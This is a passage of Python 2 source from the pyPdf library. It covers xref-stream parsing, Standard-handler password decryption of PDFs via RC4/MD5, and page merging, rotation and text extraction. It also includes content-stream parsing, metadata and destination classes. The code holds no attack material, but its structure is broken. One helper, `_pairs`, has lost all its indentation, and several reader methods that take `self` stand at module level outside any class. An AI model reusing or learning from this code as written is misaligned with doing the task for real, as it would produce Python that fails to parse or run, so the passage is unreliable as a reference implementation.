                            # field 1: entry type (0=free, 1=in use,
                            # 2=inside an object stream)
                            xref_type = di
                        elif i == 1:
                            if xref_type == 0:
                                next_free_object = di
                            elif xref_type == 1:
                                byte_offset = di
                            elif xref_type == 2:
                                objstr_num = di
                        elif i == 2:
                            if xref_type == 0:
                                next_generation = di
                            elif xref_type == 1:
                                generation = di
                            elif xref_type == 2:
                                obstr_idx = di
                    if xref_type == 0:
                        pass
                    elif xref_type == 1:
                        if not self.xref.has_key(generation):
                            self.xref[generation] = {}
                        if not num in self.xref[generation]:
                            self.xref[generation][num] = byte_offset
                    elif xref_type == 2:
                        if not num in self.xref_objStm:
                            self.xref_objStm[num] = [objstr_num, obstr_idx]
                    cnt += 1
                    num += 1
            # an xref stream doubles as its own trailer dictionary
            trailerKeys = "/Root", "/Encrypt", "/Info", "/ID"
            for key in trailerKeys:
                if xrefstream.has_key(key) and not self.trailer.has_key(key):
                    self.trailer[NameObject(key)] = xrefstream.raw_get(key)
            if xrefstream.has_key("/Prev"):
                startxref = xrefstream["/Prev"]
            else:
                break
        else:
            # bad xref character at startxref.  Let's see if we can find
            # the xref table nearby, as we've observed this error with an
            # off-by-one before.
            stream.seek(-11, 1)
            tmp = stream.read(20)
            xref_loc = tmp.find("xref")
            if xref_loc != -1:
                startxref -= (10 - xref_loc)
                continue
            else:
                # no xref table found at specified location
                assert False
                break
def _pairs(self, array):
i = 0
while True:
yield array[i], array[i+1]
i += 2
if (i+1) >= len(array):
break
def readNextEndLine(self, stream):
    """Read one line of the file *backwards* from the current position.

    Characters are accumulated (prepended) until an EOL byte is hit; any
    run of consecutive CR/LF bytes is then skipped so repeated calls step
    back one logical line at a time.  On return the stream is positioned
    just before the EOL of the preceding line.
    """
    line = ""
    while True:
        # read(1) advances by one, so seek(-2, 1) nets one step backwards.
        x = stream.read(1)
        stream.seek(-2, 1)
        if x == '\n' or x == '\r':
            # consume the whole EOL run (handles \n, \r and \r\n)
            while x == '\n' or x == '\r':
                x = stream.read(1)
                stream.seek(-2, 1)
            # step forward one byte so the EOL run is fully consumed
            stream.seek(1, 1)
            break
        else:
            # still inside the line: prepend, since we scan right-to-left
            line = x + line
    return line
##
# When using an encrypted / secured PDF file with the PDF Standard
# encryption handler, this function allows the file to be decrypted.  The
# given password is checked against both the document's user password and
# its owner password; if either matches, the derived decryption key is
# stored on the reader.
# <p>
# Which password matched does not matter: both yield the same decryption
# key, and either is sufficient to use the document with this library.
# <p>
# Stability: Added in v1.8, will exist for all future v1.x releases.
#
# @return 0 if the password failed, 1 if the password matched the user
# password, and 2 if the password matched the owner password.
#
# @exception NotImplementedError Document uses an unsupported encryption
# method.
def decrypt(self, password):
    # _override_encryption lets the internal machinery read the /Encrypt
    # dictionary itself without recursively triggering decryption; the
    # finally-clause guarantees the flag is cleared even on error.
    self._override_encryption = True
    try:
        result = self._decrypt(password)
    finally:
        self._override_encryption = False
    return result
def _decrypt(self, password):
    """Try *password* as user then owner password (Standard handler only).

    Returns 1 on user-password match, 2 on owner-password match, 0 on
    failure.  On success the decryption key is stored in
    self._decryption_key.  Raises NotImplementedError for non-Standard
    security handlers or algorithm versions other than 1 and 2.
    """
    encrypt = self.trailer['/Encrypt'].getObject()
    if encrypt['/Filter'] != '/Standard':
        raise NotImplementedError, "only Standard PDF encryption handler is available"
    if not (encrypt['/V'] in (1, 2)):
        raise NotImplementedError, "only algorithm code 1 and 2 are supported"
    user_password, key = self._authenticateUserPassword(password)
    if user_password:
        self._decryption_key = key
        return 1
    else:
        # Try the owner password: derive the user password from /O by
        # reversing algorithm 3.3 (RC4 with the rev-dependent key), then
        # authenticate the recovered user password normally.
        rev = encrypt['/R'].getObject()
        if rev == 2:
            keylen = 5
        else:
            # /Length is in bits; Python 2 "/" on ints is floor division
            keylen = encrypt['/Length'].getObject() / 8
        key = _alg33_1(password, rev, keylen)
        real_O = encrypt["/O"].getObject()
        if rev == 2:
            userpass = utils.RC4_encrypt(key, real_O)
        else:
            # rev >= 3: undo the 20 extra RC4 passes in reverse order,
            # XOR-ing each key byte with the (descending) iteration count
            val = real_O
            for i in range(19, -1, -1):
                new_key = ''
                for l in range(len(key)):
                    new_key += chr(ord(key[l]) ^ i)
                val = utils.RC4_encrypt(new_key, val)
            userpass = val
        owner_password, key = self._authenticateUserPassword(userpass)
        if owner_password:
            self._decryption_key = key
            return 2
    return 0
def _authenticateUserPassword(self, password):
    """Check *password* against the document's user password.

    Implements algorithms 3.4 (revision 2) / 3.5 (revision 3+) of the PDF
    standard security handler.  Returns (matched, key) where *matched* is
    a boolean and *key* is the derived RC4 decryption key (valid only
    when *matched* is true).
    """
    encrypt = self.trailer['/Encrypt'].getObject()
    rev = encrypt['/R'].getObject()
    owner_entry = encrypt['/O'].getObject().original_bytes
    p_entry = encrypt['/P'].getObject()
    # first element of the file /ID array feeds the key derivation
    id_entry = self.trailer['/ID'].getObject()
    id1_entry = id_entry[0].getObject()
    if rev == 2:
        U, key = _alg34(password, owner_entry, p_entry, id1_entry)
    elif rev >= 3:
        # /Length is in bits; Python 2 "/" on ints is floor division
        U, key = _alg35(password, rev,
                encrypt["/Length"].getObject() / 8, owner_entry,
                p_entry, id1_entry,
                encrypt.get("/EncryptMetadata", BooleanObject(False)).getObject())
    # Only the leading bytes of /U are significant for rev >= 3, but the
    # original code compares in full; retained as-is.
    real_U = encrypt['/U'].getObject().original_bytes
    return U == real_U, key
def getIsEncrypted(self):
    """Return True if the document trailer carries an /Encrypt dictionary."""
    # "in" replaces deprecated dict.has_key() (removed in Python 3);
    # behavior is identical for the dict-derived trailer object.
    return "/Encrypt" in self.trailer

##
# Read-only boolean property showing whether this PDF file is encrypted.
# Note that this property, if true, will remain true even after the {@link
# #PdfFileReader.decrypt decrypt} function is called.
isEncrypted = property(lambda self: self.getIsEncrypted(), None, None)
def getRectangle(self, name, defaults):
    """Fetch rectangle entry *name* from page dictionary *self*.

    Falls back through the *defaults* key sequence (e.g. /CropBox falls
    back to /MediaBox), resolves indirect references, normalizes the
    result to a RectangleObject, and caches it back onto the page.
    """
    retval = self.get(name)
    if isinstance(retval, RectangleObject):
        return retval
    # Idiom fix: compare against None with "is"/"is not" rather than
    # "=="/"!=" -- identity is the intended test and avoids any custom
    # __eq__ on PDF object types.
    if retval is None:
        for d in defaults:
            retval = self.get(d)
            if retval is not None:
                break
    if isinstance(retval, IndirectObject):
        retval = self.pdf.getObject(retval)
    retval = RectangleObject(retval)
    # Cache the normalized rectangle so subsequent lookups hit the
    # fast isinstance() path above.
    setRectangle(self, name, retval)
    return retval
def setRectangle(self, name, value):
    """Store *value* in page dictionary *self*, coercing the key to a NameObject."""
    key = name if isinstance(name, NameObject) else NameObject(name)
    self[key] = value
def deleteRectangle(self, name):
    # Remove the rectangle entry from the page dictionary; propagates
    # KeyError if the entry is absent.
    del self[name]
def createRectangleAccessor(name, fallback):
    """Build a property that proxies page rectangle entry *name*.

    Reads go through getRectangle (honoring the *fallback* key sequence),
    writes through setRectangle, deletes through deleteRectangle.
    """
    def _get(self):
        return getRectangle(self, name, fallback)

    def _set(self, value):
        setRectangle(self, name, value)

    def _del(self):
        deleteRectangle(self, name)

    return property(_get, _set, _del)
##
# This class represents a single page within a PDF file.  Typically this object
# will be created by accessing the {@link #PdfFileReader.getPage getPage}
# function of the {@link #PdfFileReader PdfFileReader} class.
class PageObject(DictionaryObject):
    def __init__(self, pdf):
        # pdf is the owning reader/writer; it is kept so indirect
        # references inside the page dictionary can be resolved later.
        DictionaryObject.__init__(self)
        self.pdf = pdf
    ##
    # Rotates a page clockwise by increments of 90 degrees.
    # <p>
    # Stability: Added in v1.1, will exist for all future v1.x releases.
    # @param angle Angle to rotate the page.  Must be an increment of 90 deg.
    def rotateClockwise(self, angle):
        assert angle % 90 == 0
        self._rotate(angle)
        return self
    ##
    # Rotates a page counter-clockwise by increments of 90 degrees.
    # <p>
    # Stability: Added in v1.1, will exist for all future v1.x releases.
    # @param angle Angle to rotate the page.  Must be an increment of 90 deg.
    def rotateCounterClockwise(self, angle):
        assert angle % 90 == 0
        self._rotate(-angle)
        return self
    def _rotate(self, angle):
        # Accumulate the rotation into the page's /Rotate entry
        # (absent entry is treated as 0 degrees).
        currentAngle = self.get("/Rotate", 0)
        self[NameObject("/Rotate")] = NumberObject(currentAngle + angle)
    def _mergeResources(res1, res2, resource):
        """Merge one resource sub-dictionary (e.g. /Font) of two pages.

        Returns (newRes, renameRes): the merged dictionary plus a map of
        res2 keys that clashed with a different value in res1 and were
        therefore given a "renamed" suffix.  The caller must rewrite
        res2's content stream using renameRes.
        """
        newRes = DictionaryObject()
        newRes.update(res1.get(resource, DictionaryObject()).getObject())
        page2Res = res2.get(resource, DictionaryObject()).getObject()
        renameRes = {}
        for key in page2Res.keys():
            if newRes.has_key(key) and newRes[key] != page2Res[key]:
                newname = NameObject(key + "renamed")
                renameRes[key] = newname
                newRes[newname] = page2Res[key]
            elif not newRes.has_key(key):
                newRes[key] = page2Res[key]
        return newRes, renameRes
    _mergeResources = staticmethod(_mergeResources)
    def _contentStreamRename(stream, rename, pdf):
        """Rewrite NameObject operands in a content stream per *rename* map."""
        if not rename:
            return stream
        stream = ContentStream(stream, pdf)
        for operands,operator in stream.operations:
            for i in range(len(operands)):
                op = operands[i]
                if isinstance(op, NameObject):
                    # leave names that were not renamed untouched
                    operands[i] = rename.get(op, op)
        return stream
    _contentStreamRename = staticmethod(_contentStreamRename)
    def _pushPopGS(contents, pdf):
        # adds a graphics state "push" and "pop" to the beginning and end
        # of a content stream.  This isolates it from changes such as
        # transformation matricies.
        stream = ContentStream(contents, pdf)
        stream.operations.insert(0, [[], "q"])
        stream.operations.append([[], "Q"])
        return stream
    _pushPopGS = staticmethod(_pushPopGS)
    ##
    # Merges the content streams of two pages into one.  Resource references
    # (i.e. fonts) are maintained from both pages.  The mediabox/cropbox/etc
    # of this page are not altered.  The parameter page's content stream will
    # be added to the end of this page's content stream, meaning that it will
    # be drawn after, or "on top" of this page.
    # <p>
    # Stability: Added in v1.4, will exist for all future 1.x releases.
    # @param page2 An instance of {@link #PageObject PageObject} to be merged
    #              into this one.
    def mergePage(self, page2):
        # First we work on merging the resource dictionaries.  This allows us
        # to find out what symbols in the content streams we might need to
        # rename.
        newResources = DictionaryObject()
        rename = {}
        originalResources = self["/Resources"].getObject()
        page2Resources = page2["/Resources"].getObject()
        for res in "/ExtGState", "/Font", "/XObject", "/ColorSpace", "/Pattern", "/Shading":
            new, newrename = PageObject._mergeResources(originalResources, page2Resources, res)
            if new:
                newResources[NameObject(res)] = new
                rename.update(newrename)
        # Combine /ProcSet sets.
        # NOTE: ImmutableSet comes from the Python 2 "sets" module.
        newResources[NameObject("/ProcSet")] = ArrayObject(
            ImmutableSet(originalResources.get("/ProcSet", ArrayObject()).getObject()).union(
                ImmutableSet(page2Resources.get("/ProcSet", ArrayObject()).getObject())
            )
        )
        # Each page's content is wrapped in q/Q so neither page's graphics
        # state changes (e.g. transformation matrices) leak into the other.
        newContentArray = ArrayObject()
        originalContent = self["/Contents"].getObject()
        newContentArray.append(PageObject._pushPopGS(originalContent, self.pdf))
        page2Content = page2['/Contents'].getObject()
        page2Content = PageObject._contentStreamRename(page2Content, rename, self.pdf)
        page2Content = PageObject._pushPopGS(page2Content, self.pdf)
        newContentArray.append(page2Content)
        self[NameObject('/Contents')] = ContentStream(newContentArray, self.pdf)
        self[NameObject('/Resources')] = newResources
    ##
    # Compresses the size of this page by joining all content streams and
    # applying a FlateDecode filter.
    # <p>
    # Stability: Added in v1.6, will exist for all future v1.x releases.
    # However, it is possible that this function will perform no action if
    # content stream compression becomes "automatic" for some reason.
    def compressContentStreams(self):
        content = self["/Contents"].getObject()
        if not isinstance(content, ContentStream):
            content = ContentStream(content, self.pdf)
        self[NameObject("/Contents")] = content.flateEncode()
    ##
    # Locate all text drawing commands, in the order they are provided in the
    # content stream, and extract the text.  This works well for some PDF
    # files, but poorly for others, depending on the generator used.  This will
    # be refined in the future.  Do not rely on the order of text coming out of
    # this function, as it will change if this function is made more
    # sophisticated.
    # <p>
    # Stability: Added in v1.7, will exist for all future v1.x releases.  May
    # be overhauled to provide more ordered text in the future.
    # @return a unicode string object
    def extractText(self):
        text = u""
        content = self["/Contents"].getObject()
        if not isinstance(content, ContentStream):
            content = ContentStream(content, self.pdf)
        # Note: we check all strings are TextStringObjects.  ByteStringObjects
        # are strings where the byte->string encoding was unknown, so adding
        # them to the text here would be gibberish.
        for operands,operator in content.operations:
            if operator == "Tj":
                # Tj: show a single text string
                _text = operands[0]
                if isinstance(_text, TextStringObject):
                    text += _text
            elif operator == "T*":
                # T*: move to next line
                text += "\n"
            elif operator == "'":
                # ': move to next line and show text
                text += "\n"
                _text = operands[0]
                if isinstance(_text, TextStringObject):
                    text += operands[0]
            elif operator == '"':
                # ": set word/char spacing, move to next line, show text
                _text = operands[2]
                if isinstance(_text, TextStringObject):
                    text += "\n"
                    text += _text
            elif operator == "TJ":
                # TJ: show an array of strings interleaved with kerning
                # numbers; only the string elements contribute text.
                for i in operands[0]:
                    if isinstance(i, TextStringObject):
                        text += i
        return text
    ##
    # A rectangle (RectangleObject), expressed in default user space units,
    # defining the boundaries of the physical medium on which the page is
    # intended to be displayed or printed.
    # <p>
    # Stability: Added in v1.4, will exist for all future v1.x releases.
    mediaBox = createRectangleAccessor("/MediaBox", ())
    ##
    # A rectangle (RectangleObject), expressed in default user space units,
    # defining the visible region of default user space.  When the page is
    # displayed or printed, its contents are to be clipped (cropped) to this
    # rectangle and then imposed on the output medium in some
    # implementation-defined manner.  Default value: same as MediaBox.
    # <p>
    # Stability: Added in v1.4, will exist for all future v1.x releases.
    cropBox = createRectangleAccessor("/CropBox", ("/MediaBox",))
    ##
    # A rectangle (RectangleObject), expressed in default user space units,
    # defining the region to which the contents of the page should be clipped
    # when output in a production enviroment.
    # <p>
    # Stability: Added in v1.4, will exist for all future v1.x releases.
    bleedBox = createRectangleAccessor("/BleedBox", ("/CropBox", "/MediaBox"))
    ##
    # A rectangle (RectangleObject), expressed in default user space units,
    # defining the intended dimensions of the finished page after trimming.
    # <p>
    # Stability: Added in v1.4, will exist for all future v1.x releases.
    trimBox = createRectangleAccessor("/TrimBox", ("/CropBox", "/MediaBox"))
    ##
    # A rectangle (RectangleObject), expressed in default user space units,
    # defining the extent of the page's meaningful content as intended by the
    # page's creator.
    # <p>
    # Stability: Added in v1.4, will exist for all future v1.x releases.
    artBox = createRectangleAccessor("/ArtBox", ("/CropBox", "/MediaBox"))
class ContentStream(DecodedStreamObject):
    """A decoded PDF content stream, parsed into (operands, operator) pairs.

    self.operations holds the parsed token stream.  The _data property
    re-serializes / re-parses on access, so mutating self.operations is
    reflected in the stream bytes and vice versa.
    """
    def __init__(self, stream, pdf):
        self.pdf = pdf
        self.operations = []
        # stream may be a StreamObject or an ArrayObject containing
        # multiple StreamObjects to be cat'd together.
        stream = stream.getObject()
        if isinstance(stream, ArrayObject):
            data = ""
            for s in stream:
                data += s.getObject().getData()
            stream = StringIO(data)
        else:
            stream = StringIO(stream.getData())
        self.__parseContentStream(stream)
    def __parseContentStream(self, stream):
        """Tokenize *stream*, filling self.operations with
        (operand list, operator) tuples in encounter order."""
        stream.seek(0, 0)
        operands = []
        while True:
            peek = readNonWhitespace(stream)
            if peek == '':
                # end of stream
                break
            stream.seek(-1, 1)
            if peek.isalpha() or peek == "'" or peek == '"':
                # an operator token terminates the pending operand list
                operator = ""
                while True:
                    tok = stream.read(1)
                    if tok.isspace() or tok in NameObject.delimiterCharacters:
                        stream.seek(-1, 1)
                        break
                    elif tok == '':
                        break
                    operator += tok
                if operator == "BI":
                    # begin inline image - a completely different parsing
                    # mechanism is required, of course... thanks buddy...
                    assert operands == []
                    ii = self._readInlineImage(stream)
                    self.operations.append((ii, "INLINE IMAGE"))
                else:
                    self.operations.append((operands, operator))
                    operands = []
            elif peek == '%':
                # If we encounter a comment in the content stream, we have to
                # handle it here.  Typically, readObject will handle
                # encountering a comment -- but readObject assumes that
                # following the comment must be the object we're trying to
                # read.  In this case, it could be an operator instead.
                while peek not in ('\r', '\n'):
                    peek = stream.read(1)
            else:
                operands.append(readObject(stream, None))
    def _readInlineImage(self, stream):
        """Parse an inline image: the settings dictionary between BI and ID,
        then the raw image bytes up to the EI terminator.

        Returns {"settings": DictionaryObject, "data": raw byte string}.
        """
        # begin reading just after the "BI" - begin image
        # first read the dictionary of settings.
        settings = DictionaryObject()
        while True:
            tok = readNonWhitespace(stream)
            stream.seek(-1, 1)
            if tok == "I":
                # "ID" - begin of image data
                break
            key = readObject(stream, self.pdf)
            tok = readNonWhitespace(stream)
            stream.seek(-1, 1)
            value = readObject(stream, self.pdf)
            settings[key] = value
        # left at beginning of ID
        tmp = stream.read(3)
        assert tmp[:2] == "ID"
        data = ""
        while True:
            tok = stream.read(1)
            if tok == "E":
                # possible "EI" terminator; an "E" not followed by "I" is
                # ordinary image data, so push the lookahead byte back
                next = stream.read(1)
                if next == "I":
                    break
                else:
                    stream.seek(-1, 1)
                    data += tok
            else:
                data += tok
        x = readNonWhitespace(stream)
        stream.seek(-1, 1)
        return {"settings": settings, "data": data}
    def _getData(self):
        """Re-serialize self.operations back into raw content-stream bytes."""
        newdata = StringIO()
        for operands,operator in self.operations:
            if operator == "INLINE IMAGE":
                newdata.write("BI")
                dicttext = StringIO()
                operands["settings"].writeToStream(dicttext, None)
                # [2:-2] strips the dictionary's "<<" and ">>" delimiters
                newdata.write(dicttext.getvalue()[2:-2])
                newdata.write("ID ")
                newdata.write(operands["data"])
                newdata.write("EI")
            else:
                for op in operands:
                    op.writeToStream(newdata, None)
                    newdata.write(" ")
                newdata.write(operator)
                newdata.write("\n")
        return newdata.getvalue()
    def _setData(self, value):
        self.__parseContentStream(StringIO(value))
    # _data presents the operations list as (de)serialized stream bytes.
    _data = property(_getData, _setData)
##
# A class representing the basic document metadata provided in a PDF File.
# <p>
# As of pyPdf v1.10, every text property of the metadata comes in two
# flavours, e.g. author and author_raw.  The non-raw property always
# returns a TextStringObject (or None), which is safe to display.  The raw
# property may return a ByteStringObject when pyPdf was unable to decode
# the string's text encoding, so callers of the raw properties must be
# prepared to handle byte strings as well.
class DocumentInformation(DictionaryObject):
    def __init__(self):
        DictionaryObject.__init__(self)
    def getText(self, key):
        """Return the entry for *key* only if it decoded to text, else None."""
        value = self.get(key, None)
        if not isinstance(value, TextStringObject):
            return None
        return value
    ##
    # The document's title.  Added in v1.6; always a unicode string
    # (TextStringObject) as of v1.10, or None if not provided.
    title = property(lambda self: self.getText("/Title"))
    title_raw = property(lambda self: self.get("/Title"))
    ##
    # The document's author.  Added in v1.6; always a unicode string
    # (TextStringObject) as of v1.10, or None if not provided.
    author = property(lambda self: self.getText("/Author"))
    author_raw = property(lambda self: self.get("/Author"))
    ##
    # The document's subject.  Added in v1.6; always a unicode string
    # (TextStringObject) as of v1.10, or None if not provided.
    subject = property(lambda self: self.getText("/Subject"))
    subject_raw = property(lambda self: self.get("/Subject"))
    ##
    # The creating application.  If the document was converted to PDF from
    # another format, this is the application (e.g. OpenOffice) that created
    # the original document.  Added in v1.6; unicode as of v1.10, or None.
    creator = property(lambda self: self.getText("/Creator"))
    creator_raw = property(lambda self: self.get("/Creator"))
    ##
    # The producing application.  If the document was converted to PDF from
    # another format, this is the application (e.g. OSX Quartz) that did the
    # conversion.  Added in v1.6; unicode as of v1.10, or None.
    producer = property(lambda self: self.getText("/Producer"))
    producer_raw = property(lambda self: self.get("/Producer"))
##
# A class representing a destination within a PDF file.
# See section 8.2.1 of the PDF 1.6 reference.
# Stability: Added in v1.10, will exist for all v1.x releases.
class Destination(DictionaryObject):
    ##
    # @param title Destination title.
    # @param page  Destination page.
    # @param typ   Fit type name, e.g. "/XYZ" or "/FitH".
    # @param args  The numeric parameters required by *typ*.
    # @exception utils.PdfReadError Unrecognized fit type.
    def __init__(self, title, page, typ, *args):
        DictionaryObject.__init__(self)
        self[NameObject("/Title")] = title
        self[NameObject("/Page")] = page
        self[NameObject("/Type")] = typ
        # from table 8.2 of the PDF 1.6 reference.
        if typ == "/XYZ":
            (self[NameObject("/Left")], self[NameObject("/Top")],
                self[NameObject("/Zoom")]) = args
        elif typ == "/FitR":
            (self[NameObject("/Left")], self[NameObject("/Bottom")],
                self[NameObject("/Right")], self[NameObject("/Top")]) = args
        elif typ in ["/FitH", "/FitBH", "FitBH"]:
            # BUG FIX: PDF name objects always carry a leading slash, so the
            # previous spelling "FitBH" could never match a parsed name and
            # valid /FitBH destinations raised PdfReadError.  The slashless
            # form is retained for backward compatibility with any caller
            # that constructed destinations with it directly.
            self[NameObject("/Top")], = args
        elif typ in ["/FitV", "/FitBV", "FitBV"]:
            # Same leading-slash fix as above for /FitBV.
            self[NameObject("/Left")], = args
        elif typ in ["/Fit", "/FitB", "FitB"]:
            # Same leading-slash fix as above; these fits take no parameters.
            pass
        else:
            raise utils.PdfReadError("Unknown Destination Type: %r" % typ)
    ##
    # Read-only property accessing the destination title.
    # @return A string.
    title = property(lambda self: self.get("/Title"))
    ##
    # Read-only property accessing the destination page.
    # @return An integer.
    page = property(lambda self: self.get("/Page"))
    ##
    # Read-only property accessing the destination type.
    # @return A string.
    typ = property(lambda self: self.get("/Type"))
    ##
    # Read-only property accessing the zoom factor.
    # @return A number, or None if not available.
    zoom = property(lambda self: self.get("/Zoom", None))
    ##
    # Read-only property accessing the left horizontal coordinate.
    # @return A number, or None if not available.
    left = property(lambda self: self.get("/Left", None))
    ##
    # Read-only property accessing the right horizontal coordinate.
    # @return A number, or None if not available.
    right = property(lambda self: self.get("/Right", None))
    ##
    # Read-only property accessing the top vertical coordinate.
    # @return A number, or None if not available.
    top = property(lambda self: self.get("/Top", None))
    ##
    # Read-only property accessing the bottom vertical coordinate.
    # @return A number, or None if not available.
    bottom = property(lambda self: self.get("/Bottom", None))
def convertToInt(d, size):
    """Interpret byte string *d* (at most 8 bytes) as a big-endian integer.

    Used to decode the variable-width fields of a cross-reference stream
    (/W entry).  Raises utils.PdfReadError when *size* exceeds 8.
    """
    if size > 8:
        raise utils.PdfReadError("invalid size in convertToInt")
    # Left-pad to exactly 8 bytes so ">q" (big-endian 64-bit) can decode it.
    padded = ("\x00\x00\x00\x00\x00\x00\x00\x00" + d)[-8:]
    return struct.unpack(">q", padded)[0]
# ref: pdf1.8 spec section 3.5.2 algorithm 3.2
# The standard 32-byte padding string used to pad/truncate passwords in the
# Standard security handler; the exact byte values are mandated by the spec.
_encryption_padding = '\x28\xbf\x4e\x5e\x4e\x75\x8a\x41\x64\x00\x4e\x56' + \
        '\xff\xfa\x01\x08\x2e\x2e\x00\xb6\xd0\x68\x3e\x80\x2f\x0c' + \
        '\xa9\xfe\x64\x53\x69\x7a'
# Implementation of algorithm 3.2 of the PDF standard security handler,
# section 3.5.2 of the PDF 1.6 reference.
def _alg32(password, rev, keylen, owner_entry, p_entry, id1_entry, metadata_encrypt=True):
    """Derive the RC4 encryption key from a password.

    password -- candidate password (byte string); rev -- /R revision from
    the encryption dictionary; keylen -- key length in bytes (/Length / 8;
    always 5 for revision 2); owner_entry -- /O bytes; p_entry -- /P
    permissions integer; id1_entry -- first element of the file /ID array;
    metadata_encrypt -- revision 3+ only: whether metadata is encrypted.
    Returns the first *keylen* bytes of the final MD5 digest.
    """
    # 1. Pad or truncate the password string to exactly 32 bytes.  If the
    # password string is more than 32 bytes long, use only its first 32 bytes;
    # if it is less than 32 bytes long, pad it by appending the required number
    # of additional bytes from the beginning of the padding string
    # (_encryption_padding).
    password = (password + _encryption_padding)[:32]
    # 2. Initialize the MD5 hash function and pass the result of step 1 as
    # input to this function.
    import md5, struct  # Python 2 stdlib modules (md5 predates hashlib)
    m = md5.new(password)
    # 3. Pass the value of the encryption dictionary's /O entry to the MD5 hash
    # function.
    m.update(owner_entry)
    # 4. Treat the value of the /P entry as an unsigned 4-byte integer and pass
    # these bytes to the MD5 hash function, low-order byte first.
    p_entry = struct.pack('<i', p_entry)
    m.update(p_entry)
    # 5. Pass the first element of the file's file identifier array to the MD5
    # hash function.
    m.update(id1_entry)
    # 6. (Revision 3 or greater) If document metadata is not being encrypted,
    # pass 4 bytes with the value 0xFFFFFFFF to the MD5 hash function.
    if rev >= 3 and not metadata_encrypt:
        m.update("\xff\xff\xff\xff")
    # 7. Finish the hash.
    md5_hash = m.digest()
    # 8. (Revision 3 or greater) Do the following 50 times: Take the output
    # from the previous MD5 hash and pass the first n bytes of the output as
    # input into a new MD5 hash, where n is the number of bytes of the
    # encryption key as defined by the value of the encryption dictionary's
    # /Length entry.
    if rev >= 3:
        for i in range(50):
            md5_hash = md5.new(md5_hash[:keylen]).digest()
    # 9. Set the encryption key to the first n bytes of the output from the
    # final MD5 hash, where n is always 5 for revision 2 but, for revision 3 or
    # greater, depends on the value of the encryption dictionary's /Length
    # entry.
    return md5_hash[:keylen]
# Implementation of algorithm 3.3 of the PDF standard security handler,
# section 3.5.2 of the PDF 1.6 reference.
def _alg33(owner_pwd, user_pwd, rev, keylen):
    """Compute the /O (owner password) entry of the encryption dictionary.

    Derives an RC4 key from *owner_pwd* (steps 1-4, see _alg33_1), then
    encrypts the padded *user_pwd* with it (once for revision 2, with 19
    extra XOR-keyed passes for revision 3+).  Returns the /O value bytes.
    """
    # steps 1 - 4
    key = _alg33_1(owner_pwd, rev, keylen)
    # 5. Pad or truncate the user password string as described in step 1 of
    # algorithm 3.2.
    user_pwd = (user_pwd + _encryption_padding)[:32]
    # 6. Encrypt the result of step 5, using an RC4 encryption function with
    # the encryption key obtained in step 4.
    val = utils.RC4_encrypt(key, user_pwd)
    # 7. (Revision 3 or greater) Do the following 19 times: Take the output
    # from the previous invocation of the RC4 function and pass it as input to
    # a new invocation of the function; use an encryption key generated by
    # taking each byte of the encryption key obtained in step 4 and performing
    # an XOR operation between that byte and the single-byte value of the
    # iteration counter (from 1 to 19).
    if rev >= 3:
        for i in range(1, 20):
            new_key = ''
            for l in range(len(key)):
                new_key += chr(ord(key[l]) ^ i)
            val = utils.RC4_encrypt(new_key, val)
    # 8. Store the output from the final invocation of the RC4 as the value of
    # the /O entry in the encryption dictionary.
    return val
# Steps 1-4 of algorithm 3.3
def _alg33_1(password, rev, keylen):
    """Derive the RC4 key used to produce (or reverse) the /O entry.

    Pads *password*, MD5-hashes it (re-hashed 50 times for revision 3+),
    and returns the first *keylen* bytes of the digest.
    """
    # 1. Pad or truncate the owner password string as described in step 1 of
    # algorithm 3.2.  If there is no owner password, use the user password
    # instead.
    password = (password + _encryption_padding)[:32]
    # 2. Initialize the MD5 hash function and pass the result of step 1 as
    # input to this function.
    import md5  # Python 2 stdlib module (predates hashlib)
    m = md5.new(password)
    # 3. (Revision 3 or greater) Do the following 50 times: Take the output
    # from the previous MD5 hash and pass it as input into a new MD5 hash.
    md5_hash = m.digest()
    if rev >= 3:
        for i in range(50):
            md5_hash = md5.new(md5_hash).digest()
    # 4. Create an RC4 encryption key using the first n bytes of the output
    # from the final MD5 hash, where n is always 5 for revision 2 but, for
    # revision 3 or greater, depends on the value of the encryption
    # dictionary's /Length entry.
    key = md5_hash[:keylen]
    return key
# Implementation of algorithm 3.4 of the PDF standard security handler,
# section 3.5.2 of the PDF 1.6 reference.
def _alg34(password, owner_entry, p_entry, id1_entry):
    """Compute the /U entry for revision 2 documents.

    Returns (U, key): the /U value bytes and the derived RC4 file key.
    """
    # 1. Create an encryption key based on the user password string, as
    # described in algorithm 3.2.
    key = _alg32(password, 2, 5, owner_entry, p_entry, id1_entry)
    # 2. Encrypt the 32-byte padding string shown in step 1 of algorithm 3.2,
    # using an RC4 encryption function with the encryption key from the
    # preceding step.
    U = utils.RC4_encrypt(key, _encryption_padding)
    # 3. Store the result of step 2 as the value of the /U entry in the
    # encryption dictionary.
    return U, key
# Implementation of algorithm 3.5 of the PDF standard security handler,
# section 3.5.2 of the PDF 1.6 reference.
# (The header previously said "algorithm 3.4", but this is the revision 3+
# /U computation, i.e. algorithm 3.5.)
def _alg35(password, rev, keylen, owner_entry, p_entry, id1_entry, metadata_encrypt):
    """Compute the /U entry for revision 3 or greater documents.

    Returns (U, key): the 32-byte /U value and the derived RC4 file key.
    """
    # 1. Create an encryption key based on the user password string, as
    # described in Algorithm 3.2.
    key = _alg32(password, rev, keylen, owner_entry, p_entry, id1_entry)
    # 2. Initialize the MD5 hash function and pass the 32-byte padding string
    # shown in step 1 of Algorithm 3.2 as input to this function.
    import md5  # Python 2 stdlib module (predates hashlib)
    m = md5.new()
    m.update(_encryption_padding)
    # 3. Pass the first element of the file's file identifier array (the value
    # of the ID entry in the document's trailer dictionary; see Table 3.13 on
    # page 73) to the hash function and finish the hash.  (See implementation
    # note 25 in Appendix H.)
    m.update(id1_entry)
    md5_hash = m.digest()
    # 4. Encrypt the 16-byte result of the hash, using an RC4 encryption
    # function with the encryption key from step 1.
    val = utils.RC4_encrypt(key, md5_hash)
    # 5. Do the following 19 times: Take the output from the previous
    # invocation of the RC4 function and pass it as input to a new invocation
    # of the function; use an encryption key generated by taking each byte of
    # the original encryption key (obtained in step 2) and performing an XOR
    # operation between that byte and the single-byte value of the iteration
    # counter (from 1 to 19).
    for i in range(1, 20):
        new_key = ''
        for l in range(len(key)):
            new_key += chr(ord(key[l]) ^ i)
        val = utils.RC4_encrypt(new_key, val)
    # 6. Append 16 bytes of arbitrary padding to the output from the final
    # invocation of the RC4 function and store the 32-byte result as the value
    # of the U entry in the encryption dictionary.
    # (implementator note: I don't know what "arbitrary padding" is supposed to
    # mean, so I have used null bytes.  This seems to match a few other
    # people's implementations)
    return val + ('\x00' * 16), key
#if __name__ == "__main__":
# output = PdfFileWriter()
#
